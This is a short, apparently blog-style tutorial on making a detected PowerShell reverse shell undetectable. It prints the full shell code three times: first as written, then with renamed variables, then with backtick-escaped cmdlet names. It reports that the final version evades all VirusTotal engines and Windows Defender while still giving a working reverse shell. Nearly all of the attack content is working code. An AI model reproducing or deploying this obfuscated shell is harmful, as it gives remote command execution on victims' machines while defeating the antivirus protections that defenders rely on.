From Detected to Undetected

Introduction

It's a boring weekend, and it's so cold outdoors. So let's play a little bit with VirusTotal.

What we are going to do right now is to take a detected sample of the antivirus and make it undetectable.

VirusTotal aggregates many antivirus products and online scan engines to check for viruses that the user's own antivirus may have missed or verified against any false positives. Antivirus software vendors can receive copies of files flagged by other scans but passed by their own engine to help improve their software.

Malicious Sample

Our sample choice is ".", coded by .

$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$stream = $client.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2  = $sendback + "PS " + (pwd).Path + "> "
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()}
$client.Close()

First, let’s check our sample with VirusTotal for first time before doing anything.

Playtime

The easiest thing we can do first. It is changing the names of the variables with random names.

$Melia = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
$Hekate = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$Tyr = (iex $Hekate 2>&1 | Out-String )
$Tyr2  = $Tyr + "PS " + (pwd).Path + "> "
$Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
$Plouton.Write($Lucretia,0,$Lucretia.Length)
$Plouton.Flush()}
$Melia.Close()

Let’s scan again now with our friend.

The magic of `

Let's try to add backtick between the commands. Then we'll see if VirusTotal can catch it or not.

Escape sequences begin with the backtick character, known as the grave accent (ASCII 96), and are case-sensitive. The backtick character can also be referred to as the escape character.

Escape sequences are only interpreted when contained in double-quoted (") strings.

So, we must be wary of where we set the backtick. We don't want to break our commands.

When we escape, "a" with backtick means alert PowerShell (who`ami), and when we escape "f" with backtick means form feed (ipcon`fig), so both commands break. And when we escape the other character, commands don't break because then characters do not render the special meaning.

To make the picture clear to you. See the following image.

Let's continue and add backtick to our code.

$Melia = nEW`-oBj`ECt System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
$Hekate = (nEW`-oBj`ECt -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$Tyr = (I`Ex $Hekate 2>&1 | ouT`-St`RINg )
$Tyr2  = $Tyr + "PS " + (P`w`d).Path + "> "
$Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
$Plouton.Write($Lucretia,0,$Lucretia.Length)
$Plouton.Flush()}
$Melia.Close()

Upload it to VirusTotal again and scan it.

Really, I'm disappointed! We want to play more, but "No security vendors and no sandboxes flagged this file as malicious.”

Test Time

It's time to test our code to bypass Windows Defender and get a reverse shell. To make sure everything is working correctly.

It works fine.

Closing Words

Sometimes, we may not need much to do to avoid antivirus software! We could bypass all the antivirus software by changing the variable names and adding some backtick to the code like what you saw before.